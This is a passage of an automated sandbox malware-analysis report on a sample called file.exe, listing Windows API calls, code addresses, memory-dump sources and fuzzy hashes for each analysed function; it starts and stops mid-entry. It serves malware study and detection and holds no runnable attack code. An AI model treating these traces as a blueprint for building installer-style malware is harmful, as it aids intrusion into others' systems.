                                                              • Opcode Fuzzy Hash: 673ead7fa0e448a1c5043ade6eeb1382bb3ed77738cd55eb2ad3f0262cc6e6ef
                                                              • Instruction Fuzzy Hash: C9219231904108BADF11AFA5CF49A9D7A71FF84358F20413FF201B91E1CBBD8982AA5D
                                                              APIs
                                                              • GlobalFree.KERNEL32(00000000), ref: 00401C10
                                                              • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C22
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Global$AllocFree
                                                              • String ID: Exec
                                                              • API String ID: 3394109436-459137531
                                                              • Opcode ID: fb5b9ebeaad3a79f54b281eda5c862824b880451e65e455491233296c99b22fc
                                                              • Instruction ID: 52bd34c5afe528d1e7f7705a0b64ffdd7bdb14472fd10e075fda9825736fe234
                                                              • Opcode Fuzzy Hash: fb5b9ebeaad3a79f54b281eda5c862824b880451e65e455491233296c99b22fc
                                                              • Instruction Fuzzy Hash: B221F972900254E7D720BF98DD89E5E73B5AB04718711093FF552B76C0D7B8AC019B9D
                                                              APIs
                                                                • Part of subcall function 004068B4: FindFirstFileW.KERNELBASE(?,0042FAB8,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,C:\Users\user\AppData\Local\Temp\nsbB152.tmp, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,75573420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                                                • Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB
                                                              • lstrlenW.KERNEL32 ref: 00402344
                                                              • lstrlenW.KERNEL32(00000000), ref: 0040234F
                                                              • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402378
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: FileFindlstrlen$CloseFirstOperation
                                                              • String ID:
                                                              • API String ID: 1486964399-0
                                                              • Opcode ID: 0f4398602f2a15397442c9cb80a4579519cf27728a25c26cde818a96ec5f227a
                                                              • Instruction ID: 885267ae01076befc9d2550e8446c8d72b56611081dd9eb5b5e506e95b58587e
                                                              • Opcode Fuzzy Hash: 0f4398602f2a15397442c9cb80a4579519cf27728a25c26cde818a96ec5f227a
                                                              • Instruction Fuzzy Hash: 04117071900318AADB10EFB9D90AA9EB6F8AF14354F20543FA401F72D1DBB88941CB59
                                                              APIs
                                                              • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D6
                                                              • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E9
                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,00000000,00000011,00000002), ref: 00402602
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Enum$CloseValue
                                                              • String ID:
                                                              • API String ID: 397863658-0
                                                              • Opcode ID: a30a11a05d1993aef0f7726c39992e41007362dd6c4f729a0cb4b13ed53f7ac1
                                                              • Instruction ID: 3ff9118d8f065173f4d59a226331d9f1933cb8120024fa56e57d9af690fc2804
                                                              • Opcode Fuzzy Hash: a30a11a05d1993aef0f7726c39992e41007362dd6c4f729a0cb4b13ed53f7ac1
                                                              • Instruction Fuzzy Hash: 16017171904105ABEB149F949E58AAF7678FF40308F10443EF505B61C0DBB85E40A66D
                                                              APIs
                                                                • Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                                                • Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                                              • GetFileVersionInfoSizeW.KERNELBASE(0000000B,00000000,?,000000EE), ref: 00402045
                                                              • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00402064
                                                                • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressAllocFileGlobalHandleInfoModuleProcSizeVersionwsprintf
                                                              • String ID:
                                                              • API String ID: 2520467145-0
                                                              • Opcode ID: 437d11790d74782efc94b12913d614b64cca238e61eba87ae2d2cc7f25da6320
                                                              • Instruction ID: 763ad8e8b63f2924b10e93d9a85bf0a11dc22f08f43b137c8aa05ca7cc66be5b
                                                              • Opcode Fuzzy Hash: 437d11790d74782efc94b12913d614b64cca238e61eba87ae2d2cc7f25da6320
                                                              • Instruction Fuzzy Hash: E7213871900208AFDB11DFE5C985EEEBBB4EF08354F11402AFA05B62D0D7759E51DB64
                                                              APIs
                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                              • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
                                                              • Instruction ID: 0adee223d2b7ba7d815a442a2885e1f2b60e3b86eb1a18037e9b6c54a102055c
                                                              • Opcode Fuzzy Hash: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
                                                              • Instruction Fuzzy Hash: 0E01FF31620220AFE7195B389E05B6B3698E710329F10863FF851F62F1EA78DC429B4C
                                                              APIs
                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040245B
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00402464
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseDeleteValue
                                                              • String ID:
                                                              • API String ID: 2831762973-0
                                                              • Opcode ID: ac608fdb2779203a5befd5ae41b504f19679aceccba4adcfaa0019147e4ceade
                                                              • Instruction ID: 0b96b132e490ce7cd6ce1444893b6524bba18796501a832965f154b7c78b6e42
                                                              • Opcode Fuzzy Hash: ac608fdb2779203a5befd5ae41b504f19679aceccba4adcfaa0019147e4ceade
                                                              • Instruction Fuzzy Hash: 82F06832A04510ABDB00BBA89A4D9EE62A5AF54314F11443FE502B71C1CAFC5D02966D
                                                              APIs
                                                              • CreateDirectoryW.KERNELBASE(00437800,?), ref: 00405AED
                                                              • GetLastError.KERNEL32 ref: 00405AFB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectoryErrorLast
                                                              • String ID:
                                                              • API String ID: 1375471231-0
                                                              • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                              • Instruction ID: ed7a645988c2e2a06802fdc928ba12763e2e88a5fcf473fdfb2f1107ef0c66eb
                                                              • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                              • Instruction Fuzzy Hash: 56F0F970D0060DDBDB00CFA4C5497DFBBB4AB04305F00812AD545B6281D7B95248CBA9
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
                                                              • CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateHandleProcess
                                                              • String ID:
                                                              • API String ID: 3712363035-0
                                                              • Opcode ID: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
                                                              • Instruction ID: b1032d8704f3223f2a9afbe03a7757fefc60a77e8ecf1711bb84520e71ece662
                                                              • Opcode Fuzzy Hash: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
                                                              • Instruction Fuzzy Hash: 91E09AB4600219BFEB109B74AD06F7B767CE704604F408475BD15E2151D774A8158A78
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                                                • Part of subcall function 004068DB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
                                                                • Part of subcall function 004068DB: wsprintfW.USER32 ref: 0040692D
                                                                • Part of subcall function 004068DB: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                              • String ID:
                                                              • API String ID: 2547128583-0
                                                              • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                              • Instruction ID: ff64ee7455e026c1647d72c339307a336527f79dacb59e64982fca04d7429b22
                                                              • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                              • Instruction Fuzzy Hash: 38E08673504210AFD61057705D04D27B3A89F85740302443EF946F2140DB34DC32ABA9
APIs
• GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\file.exe,80000000,00000003), ref: 0040604B
• CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
Memory Dump Source
• Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: File$AttributesCreate
• String ID:
• API String ID: 415043291-0
• Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
• Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
• Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
• Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
APIs
• GetFileAttributesW.KERNELBASE(?,?,00405C27,?,?,00000000,00405DFD,?,?,?,?), ref: 00406027
• SetFileAttributesW.KERNEL32(?,00000000), ref: 0040603B
Memory Dump Source
• Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
• Instruction ID: 97cbb32404f08d1f6fed837f871d2b37f55cf766f9720be9b575451f5cdabe77
• Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
• Instruction Fuzzy Hash: A3D0C972504220AFC2102728AE0889BBB55EB542717028A35FCA9A22B0CB304CA68694
APIs
• CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
• GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B19
Memory Dump Source
• Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID:
• API String ID: 1375471231-0
• Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
• Instruction ID: 8c4969e502f5bc4c8dfdefb7e9c2ba363b64d1215f12130c86bef4ebeef6f559
• Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
• Instruction Fuzzy Hash: 19C08C30310902DACA802B209F087173960AB80340F158439A683E00B4CA30A065C92D
APIs
• SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040174E
Memory Dump Source
• Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: PathSearch
• String ID:
• API String ID: 2203818243-0
• Opcode ID: d808a61f5ad900bf7ed85ac91a182ba8082c891450206748c020b13630da23e4
• Instruction ID: 361b5ea4dce5ff5b5c0a009366d47470cb0510696b1a56dfa9010847a1c89de2
• Opcode Fuzzy Hash: d808a61f5ad900bf7ed85ac91a182ba8082c891450206748c020b13630da23e4
• Instruction Fuzzy Hash: 21E08071204104ABE700DB64DD49EAE77BCDF5036CF20553BE511E60D1E7B45905971D
APIs
• RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E5C,00000000,?,?), ref: 0040641B
Memory Dump Source
• Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
• Instruction ID: 64249f1610b479570df181ce2e9e182bf10c6facee3c5f7fb09e5bef7ea49c41
• Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
• Instruction Fuzzy Hash: E6E0E672010109BFEF095F90DD4AD7B7B1DE708310F11492EF906D5051E6B5E9305674
APIs
• ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E7,00000000,00000000,0040330B,000000FF,00000004,00000000,00000000,00000000), ref: 004060DE
Memory Dump Source
• Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
